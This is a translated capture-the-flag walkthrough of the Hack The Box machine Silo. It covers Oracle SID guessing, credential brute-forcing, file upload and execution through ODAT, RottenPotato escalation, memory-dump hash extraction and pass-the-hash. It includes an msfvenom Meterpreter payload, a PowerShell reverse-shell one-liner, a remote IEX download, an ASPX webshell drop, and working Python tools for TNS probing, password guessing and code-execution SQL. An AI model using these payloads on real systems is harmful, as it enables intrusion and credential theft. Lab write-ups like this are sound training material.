
HTB Lab Series: Windows Machine Silo

2022-01-27 19:01:52  Views: 196  Source: Internet

Tags: HTB, Windows, bytes, tcp, 10.82, RPC, 10.10, target machine


This machine involves an Oracle database, something I had never touched before, so I took the opportunity to get familiar with how it is operated. It also involves memory forensics; at the last Meiya Cup (美亚杯) I had only skimmed the surface of 取证大师 (Forensics Master), so this was also a chance to properly study forensics.

Reconnaissance

nmap -sC -sV 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.073s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-09T05:17:36
|_  start_date: 2021-02-09T03:07:49

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds

Port 80 is IIS 8.5. A search turns up no exploitable vulnerability in it, so on its own it is probably a rabbit hole (it only becomes useful later, as a place to drop a webshell once we can write files to the host).

Port 135 and the five-digit high ports are all MSRPC, with nothing exploitable; a null session is refused:

rpcclient -U '' 10.10.10.82
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Ports 139 and 445 reveal the target OS version, but anonymous access is denied, so no shares can be listed (smbmap's "445 not open" is a false negative: nmap shows the port open, the session setup was simply refused):

$smbclient -L //$ip/
Enter WORKGROUP\chris's password: 
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[root@kali]─[~]
└──╼ $smbmap -H $ip
[!] 445 not open on 10.10.10.82....

Port 1521 is the Oracle TNS listener, the network front end of an Oracle database. This is the way in: not a listener vulnerability as such, but default credentials on the XE instance that are accepted with SYSDBA, which lets ODAT read and write files on the host and execute programs.

Getting SYSTEM

Method 1

This method does not need a web (IIS) foothold first.

First install ODAT; on Kali, simply typing odat triggers the automatic install.

Then start the attack. First enumerate SIDs (the instance names the listener knows about):

~ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...              ########## | ETA:  00:00:01
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################| Time: 00:02:22
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################| Time: 00:00:05
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...              ####       | ETA:  00:00:15
100% |#######################################################| Time: 00:02:22
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

Two valid SIDs were found; after testing, XE is the one that works (XEXDB is the XML DB service).

The same step can be done with Metasploit: use auxiliary/scanner/oracle/sid_brute (sid_enum only asks the listener for its SIDs, which this 11g listener refuses, as the "(unauthorized)" in the nmap output shows) and point SID_FILE at a larger dictionary, for example:

/usr/share/metasploit-framework/data/wordlists/sid.txt
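To show what a SID guesser actually does on the wire, here is an added example (written for this page, not ODAT's or Metasploit's code). It builds a raw TNS CONNECT packet for one candidate SID, parses the listener's reply and classifies the candidate the way the tools do: a REFUSE carrying ORA-12505 or ORA-12514 means the listener does not know the SID, anything else (ACCEPT, REDIRECT, RESEND, or a different error such as a bad password) means it exists. The packet field values follow the public TNS layout, the reply fixtures at the bottom are constructed for offline testing, and only the main block talks to a real listener.

```python
#!/usr/bin/env python3
"""Raw TNS SID probe: one CONNECT per candidate SID, classify the reply.
Example code written for this page, not ODAT's or Metasploit's source."""
import re
import socket
import struct
import sys

TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
CONNECT_DATA_OFFSET = 58              # 8-byte header + 42-byte connect body + 8 bytes of padding
UNKNOWN_SID_ERRORS = (12505, 12514)   # listener does not currently know of SID / service name


def build_connect(sid: str, host: str, port: int) -> bytes:
    """Build a TNS CONNECT packet whose connect data asks for `sid`."""
    cd = (f"(DESCRIPTION=(CONNECT_DATA=(SID={sid}))"
          f"(ADDRESS=(PROTOCOL=TCP)(HOST={host})(PORT={port})))").encode()
    body = struct.pack(
        ">HHHHHHHHHHIBBIIQ",
        0x0138, 0x012C,          # protocol version, lowest compatible version
        0x0C41, 0x2000, 0x7FFF,  # service options, SDU, TDU
        0x7F08, 0x0000, 0x0100,  # NT protocol characteristics, line turnaround, "value of 1" byte-order probe
        len(cd), CONNECT_DATA_OFFSET,
        0x00000800,              # max receivable connect data
        0x41, 0x41,              # connect flags 0 / 1
        0, 0, 0,                 # trace cross-facility items and unique connection id
    ) + b"\x00" * 8 + cd
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_CONNECT, 0, 0) + body


def parse_response(data: bytes):
    """Return (packet_type, oracle_error); the error is None unless the packet is a REFUSE."""
    if len(data) < 8:
        raise ValueError("short TNS packet")
    ptype = data[4]
    err = None
    if ptype == TNS_REFUSE:
        # REFUSE body: reason_user(1) reason_system(1) data_len(2) data containing "(ERR=nnnn)"
        dlen = struct.unpack(">H", data[10:12])[0]
        m = re.search(rb"\(ERR=(\d+)\)", data[12:12 + dlen])
        err = int(m.group(1)) if m else None
    return ptype, err


def sid_is_valid(ptype: int, err) -> bool:
    """The guesser's rule: only an 'unknown SID' refusal rules a candidate out."""
    if ptype == TNS_REFUSE:
        return err not in UNKNOWN_SID_ERRORS
    return True   # ACCEPT, REDIRECT or RESEND: the listener resolved the SID


def probe(host: str, port: int, sid: str, timeout: float = 5.0):
    """Send one CONNECT for `sid` to a live listener and classify the reply."""
    pkt = build_connect(sid, host, port)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(pkt)
        ptype, err = parse_response(s.recv(4096))
        if ptype == TNS_RESEND:    # 11g listeners often ask for one resend first
            s.sendall(pkt)
            ptype, err = parse_response(s.recv(4096))
    return ptype, err


def guess_sids(host: str, port: int, candidates):
    return [sid for sid in candidates if sid_is_valid(*probe(host, port, sid))]


# Constructed replies for offline testing (not captured from 10.10.10.82).
def make_refuse(err: int) -> bytes:
    text = f"(DESCRIPTION=(ERR={err})(ERROR_STACK=(ERROR=(CODE={err})(EMFI=4))))".encode()
    body = struct.pack(">BBH", 0x22, 0, len(text)) + text
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_REFUSE, 0, 0) + body


def make_accept() -> bytes:
    body = struct.pack(">HHHHHHHBB", 0x0138, 0, 0x2000, 0x7FFF, 0x0100, 0, 24, 0x41, 0x41)
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_ACCEPT, 0, 0) + body


if __name__ == "__main__":
    if len(sys.argv) > 1:   # e.g. python3 tns_sid_probe.py 10.10.10.82 XE XEXDB ORCL
        print(guess_sids(sys.argv[1], 1521, sys.argv[2:] or ["XE", "XEXDB", "ORCL"]))
    else:
        for name, reply in (("ORA-12505 refuse", make_refuse(12505)), ("accept", make_accept())):
            print(name, "->", sid_is_valid(*parse_response(reply)))
```

Because a valid SID is recognised from any reply other than the two "unknown" errors, the probe needs no credentials at all; that is also why the sidguesser output above finds XE and XEXDB long before any password is known.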

Password guessing

Next, brute-force usernames and passwords against the XE SID with ODAT's built-in account list:

➜  ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt

[+] Valid credentials found: scott/tiger. Continue...  

I also came across another way of using ODAT, which I will study and explain in more detail in a separate article on ODAT: the all module runs every check in one go (SID guessing, password guessing and the privilege checks):

odat all -s 10.10.10.82 -p 1521 -d XE
--snipped--
[+] Valid credentials found: scott/tiger. Continue...
--snipped--

There is also a password-guessing script written by 0xdf (HTB: Silo | 0xdf hacks stuff). It uses cx_Oracle directly and tries user:password pairs in parallel:

#!/usr/bin/env python
# Parallel Oracle credential guesser (0xdf's script). The target from argv is now
# passed to the worker processes; the original ignored it and always used the
# hard-coded host.

import sys
from multiprocessing import Pool

import cx_Oracle

MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"

def usage():
    print("{} [ip] [wordlist]".format(sys.argv[0]))
    print("  wordlist should be of the format [username]:[password]")
    sys.exit(1)

def _init(target):
    # Runs once in every worker so `host` is set regardless of the start method.
    global host
    host = target

def scan(userpass):
    # One worker attempts one user:password pair against the XE service.
    u, p = userpass.split(':')[:2]
    try:
        conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
        conn.close()
        return u, p, True
    except cx_Oracle.DatabaseError:
        return u, p, False


def main(target, userpassfile, nprocs=MAX_PROC):
    with open(userpassfile, 'r') as f:
        # Skip blank lines and lines without a ':' so split() cannot fail in a worker.
        userpass = [line for line in f.read().rstrip().replace('\r', '').split('\n') if ':' in line]

    pool = Pool(processes=nprocs, initializer=_init, initargs=(target,))

    for username, pass_, status in pool.imap_unordered(scan, userpass):
        if status:
            print("Found {} / {}\n\n".format(username, pass_))
        else:
            sys.stdout.write("\r {}/{}                               ".format(username, pass_))
            sys.stdout.flush()

if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
    main(sys.argv[1], sys.argv[2])

There is nothing of interest in the database itself, so the route used here is to upload a malicious executable and execute it. Generate the payload (LHOST must be your own VPN address and must match the handler below):

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=4445 -f exe > 1.exe

Upload it with the utlfile module (UTL_FILE writes the file with the privileges of the Oracle service account, which is why --sysdba matters):

odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe

Then execute it through an external table (the externaltable module creates a table whose PREPROCESSOR is our executable; selecting from the table runs the program):

odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe

Before running the executable, start the Metasploit handler so the callback has something to connect to:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
lhost => 10.10.16.7
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.7:4445 
[*] Sending stage (200262 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800

That's it. The session comes back with the privileges of the Oracle service, which is how this route reaches SYSTEM without a web foothold.
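As an added illustration (my code, not ODAT's source), the following generates the SQL behind the two modules used above: utlfile writes the binary in HEXTORAW chunks through UTL_FILE.PUT_RAW, and externaltable defines an external table whose PREPROCESSOR is the uploaded file, so that a plain SELECT makes the server execute it. The directory and table names (ODAT_DIR, EXT_EXEC_TMP) and the 16383-byte chunk size are my choices, the payload in the main block is a constructed stand-in for 1.exe, and run() executes the statements with cx_Oracle only when pointed at a real instance.

```python
#!/usr/bin/env python3
"""What `odat utlfile --putFile` and `odat externaltable --exec` do underneath.
Example code written for this page, not ODAT's own source."""

UTL_FILE_MAX_RAW = 32767                  # UTL_FILE.PUT_RAW writes at most this many bytes per call
PLSQL_LITERAL_MAX = 32767                 # longest string literal PL/SQL accepts
CHUNK = min(UTL_FILE_MAX_RAW, PLSQL_LITERAL_MAX // 2)   # hex doubles the size, so 16383 bytes per chunk


def q(s: str) -> str:
    """Escape a value for use inside a single-quoted SQL literal."""
    return s.replace("'", "''")


def hex_chunks(data: bytes, size: int = CHUNK):
    """Split a binary into HEXTORAW-sized upper-case hex pieces."""
    return [data[i:i + size].hex().upper() for i in range(0, len(data), size)]


def put_file_sql(directory, remote_dir, remote_name, data):
    """Statements that write `data` to remote_dir\\remote_name (the utlfile module).
    CREATE ANY DIRECTORY is needed for the first statement, hence --sysdba."""
    stmts = [f"CREATE OR REPLACE DIRECTORY {directory} AS '{q(remote_dir)}'"]
    for i, chunk in enumerate(hex_chunks(data)):
        mode = "wb" if i == 0 else "ab"   # create the file on the first chunk, append the rest
        stmts.append(
            "DECLARE f UTL_FILE.FILE_TYPE; BEGIN "
            f"f := UTL_FILE.FOPEN('{directory}', '{q(remote_name)}', '{mode}', {UTL_FILE_MAX_RAW}); "
            f"UTL_FILE.PUT_RAW(f, HEXTORAW('{chunk}'), TRUE); "
            "UTL_FILE.FCLOSE(f); END;"
        )
    return stmts


def exec_file_sql(directory, remote_dir, remote_name, table="EXT_EXEC_TMP"):
    """Statements that make the server run remote_dir\\remote_name (the externaltable module):
    ORACLE_LOADER executes the PREPROCESSOR program and parses its stdout as rows."""
    return [
        f"CREATE OR REPLACE DIRECTORY {directory} AS '{q(remote_dir)}'",
        f"CREATE TABLE {table} (line VARCHAR2(4000)) ORGANIZATION EXTERNAL ("
        f"TYPE ORACLE_LOADER DEFAULT DIRECTORY {directory} ACCESS PARAMETERS ("
        f"RECORDS DELIMITED BY NEWLINE PREPROCESSOR {directory}:'{q(remote_name)}' "
        f"NOLOGFILE NOBADFILE) LOCATION ('{q(remote_name)}'))",
        f"SELECT * FROM {table}",          # the SELECT is what triggers execution
        f"DROP TABLE {table}",
    ]


def run(dsn, user, password, statements, sysdba=True):
    """Execute the statements with cx_Oracle (needs the Oracle client libraries; not used offline)."""
    import cx_Oracle
    mode = cx_Oracle.SYSDBA if sysdba else cx_Oracle.DEFAULT_AUTH
    with cx_Oracle.connect(user, password, dsn, mode=mode) as conn:
        cur = conn.cursor()
        for stmt in statements:
            cur.execute(stmt)


if __name__ == "__main__":
    # Constructed stand-in for 1.exe; use open("1.exe", "rb").read() for the real payload.
    payload = b"MZ" + b"\x90" * 40000
    stmts = put_file_sql("ODAT_DIR", "C:\\", "1.exe", payload) + exec_file_sql("ODAT_DIR", "C:\\", "1.exe")
    for s in stmts:
        print(s[:110] + ("..." if len(s) > 110 else ""))
    # run("10.10.10.82:1521/XE", "scott", "tiger", stmts)   # against the real box
```

Two things worth noticing: the file is written and the preprocessor executed by the OS account running the Oracle service, not by SCOTT, and the external table is a persistent object, so the DROP at the end matters if you care about leaving traces.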

Method 2

Read the flag directly with ODAT. The ctxsys module abuses the CTXSYS text-indexing package to read arbitrary files as the Oracle service account, so the Administrator's root.txt is reachable without any shell:

odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt

[1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server                                                   
[+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'):                                                        
82FDAB14799E467FCE23979F9C1BF92C

Method 3

Credit to 0xdf for the idea.

This starts from the low-privileged IIS shell obtained in the web section below. When whoami /priv in that shell shows SeImpersonatePrivilege, we can escalate with RottenPotato (the privilege lets the process impersonate a SYSTEM token it coerces out of the local COM/RPC services):

PS C:\windows\system32\inetsrv>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Download MSFRottenPotato.exe (the author links to GitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM).

Then write a batch file (rev.bat) containing a PowerShell reverse shell. Note the doubled %% in the one-liner: that is how a literal % is written inside a .bat file.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"

Download both to the target from a web server on the attacking machine:

PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')

Then run it, passing the batch file as the command to launch with the stolen token:

PS C:\temp> c:\temp\lp.exe * \temp\rev.bat
connect sock
CreateIlok: 0 0
start RPC  connection
CreateDoc: 0 0
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 132
COM -> bytes sent: 132
COM -> bytes received: 127
RPC -> bytes Sent: 127
RPC -> bytes received: 196
COM -> bytes sent: 196
COM -> bytes received: 243
RPC -> bytes Sent: 243
RPC -> bytes received: 192
COM -> bytes sent: 192
COM -> bytes received: 72
RPC -> bytes Sent: 72
RPC -> bytes received: 60
COM -> bytes sent: 60
COM -> bytes received: 42
RPC -> bytes Sent: 42
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token tye:2
[+] DuplicateTokenEx :1  0
[+] Duped Token type:1
[+] Running \temp\rev.bat sessionId 1
[+] CreateProcessWithTokenW OK
Auth result: 0
Return code: 0
Last error: 0

Remember to have the nc listener running first:

root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085
listening on [any] 8085 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181

PS C:\Windows\system32> whoami
nt authority\system

Method 4

On the user's desktop there is not only the flag but also a file called Oracle issue.txt:

dir \users\Phineas\Desktop


    Directory: C:\users\Phineas\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          1/5/2018  10:56 PM        300 Oracle issue.txt
-a---          1/4/2018   9:41 PM         32 user.txt

It says a full memory dump of the machine was shared with a support vendor through Dropbox, and gives the link and its password:

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$

Download the dump and analyse it with Volatility. First determine the profile with kdbgscan (it suggests Win2012R2x64):

volatility kdbgscan -f SILO-20180105-221806.dmp
**************************************************
Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)
Offset (V)                    : 0xf80078520a30
Offset (P)                    : 0x2320a30
KdCopyDataBlock (V)           : 0xf8007845f9b0
Block encoded                 : Yes
Wait never                    : 0xd08e8400bd4a143a
Wait always                   : 0x17a949efd11db80
KDBG owner tag check          : True
Profile suggestion (KDBGHeader): Win2012R2x64_18340
Version64                     : 0xf80078520d90 (Major: 15, Minor: 9600)
Service Pack (CmNtCSDVersion) : 0
Build string (NtBuildLab)     : 9600.16384.amd64fre.winblue_rtm.
PsActiveProcessHead           : 0xfffff80078537700 (51 processes)
PsLoadedModuleList            : 0xfffff800785519b0 (148 modules)
KernelBase                    : 0xfffff8007828a000 (Matches MZ: True)
Major (OptionalHeader)        : 6
Minor (OptionalHeader)        : 3
KPCR                          : 0xfffff8007857b000 (CPU 0)
KPCR                          : 0xffffd000207e8000 (CPU 1)

**************************************************
...

Next, extract the account hashes. hivelist gives the virtual addresses of the registry hives; hashdump needs the SYSTEM hive (-y) and the SAM hive (-s):

volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat

root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

Finally, pass the hash with psexec.py. The NT hash alone is enough to authenticate as Administrator over SMB; no cracking is required:

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file XryxqKFr.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service PAYb on 10.10.10.82.....
[*] Starting service PAYb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
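The hashdump lines above are all the pass-the-hash step needs, but it helps to know what each field means. The following added example (my code, not Volatility's or Impacket's) parses the dump, flags the empty LM hash aad3b435... (LM storage disabled) and the empty-password NT hash 31d6cfe0... (the Guest account), builds the LM:NT argument psexec.py expects, and implements MD4 in pure Python so a password guess can be checked against an NT hash even where hashlib's md4 is unavailable. The sample dump is the output shown above.

```python
#!/usr/bin/env python3
"""Triage a Volatility hashdump for pass-the-hash and verify password guesses.
Example code written for this page, not Volatility's or Impacket's source."""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "", i.e. LM storage disabled


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python; hashlib's md4 is often disabled under OpenSSL 3)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bitlen = len(msg) * 8
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bitlen)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for f, order, shifts, k in rounds:
            for i, j in enumerate(order):
                t = -i % 4                                   # update a, d, c, b in turn
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rol((v[t] + f(x, y, z) + X[j] + k) & MASK, shifts[i % 4])
        a, b, c, d = [(s + w) & MASK for s, w in zip((a, b, c, d), v)]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT (NTLM) hash: MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """Parse `user:rid:lm:nt:::` lines into triage records; banner lines are skipped."""
    blank_nt = nt_hash("")
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        records.append({
            "user": user, "rid": rid, "nt": nt,
            "lm_disabled": lm == EMPTY_LM,
            "blank_password": nt == blank_nt,
            # psexec.py -hashes LM:NT only uses the NT half; a blank-password account is no use for PtH
            "pth_hashes": None if nt == blank_nt else f"{EMPTY_LM}:{nt}",
        })
    return records


def check_guess(record, candidate: str) -> bool:
    """Confirm or refute a password guess against one dumped NT hash."""
    return nt_hash(candidate) == record["nt"]


# The hashdump output shown above, embedded as sample input.
SAMPLE_DUMP = """Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""

if __name__ == "__main__":
    for r in parse_hashdump(SAMPLE_DUMP):
        print(r["user"], "blank password" if r["blank_password"] else "-hashes " + r["pth_hashes"])
```

Administrator and Phineas both come out as pass-the-hash candidates, Guest does not, and the first half of every -hashes argument is the empty LM value, which is exactly what the psexec.py command above uses.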

Post-exploitation

Because I went straight to the ODAT scripts, I never actually logged into the database during the attack, even after obtaining its credentials. While writing up these notes I looked at other people's approaches and compiled the steps for logging into the database (my machine did not even have Oracle installed; installing the database afterwards was truly painful).

Database enumeration

The article HTB: Silo - PurpleRabbit explains that you do not need to install the Oracle database itself; the sqlplus client alone is enough to log in. Here is that method:

sqlplus scott/tiger@10.10.10.82:1521/XE
SQL> select table_name from user_tables;

TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Nothing of interest in the database.

Getting a web (IIS) shell

Idea from 0xdf.

Upload a webshell into the IIS webroot with ODAT's dbmsadvisor module (DBMS_ADVISOR.CREATE_FILE can write a file anywhere the Oracle service account can):

root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
  
[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)

This puts an ASPX command-execution webshell into the webroot of the IIS 8.5 server found during the scan; browsing to /0xdf.aspx on port 80 gives command execution as the IIS worker process.

From that webshell, download and run a reverse-shell script.

Start a web server on the attacking machine:

python -m SimpleHTTPServer 80

Then, in the webshell's command box:

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')

This gives a reverse shell as the low-privileged IIS account, which is the starting point for Method 3 above.

Source: https://blog.csdn.net/m0_57221101/article/details/122722260
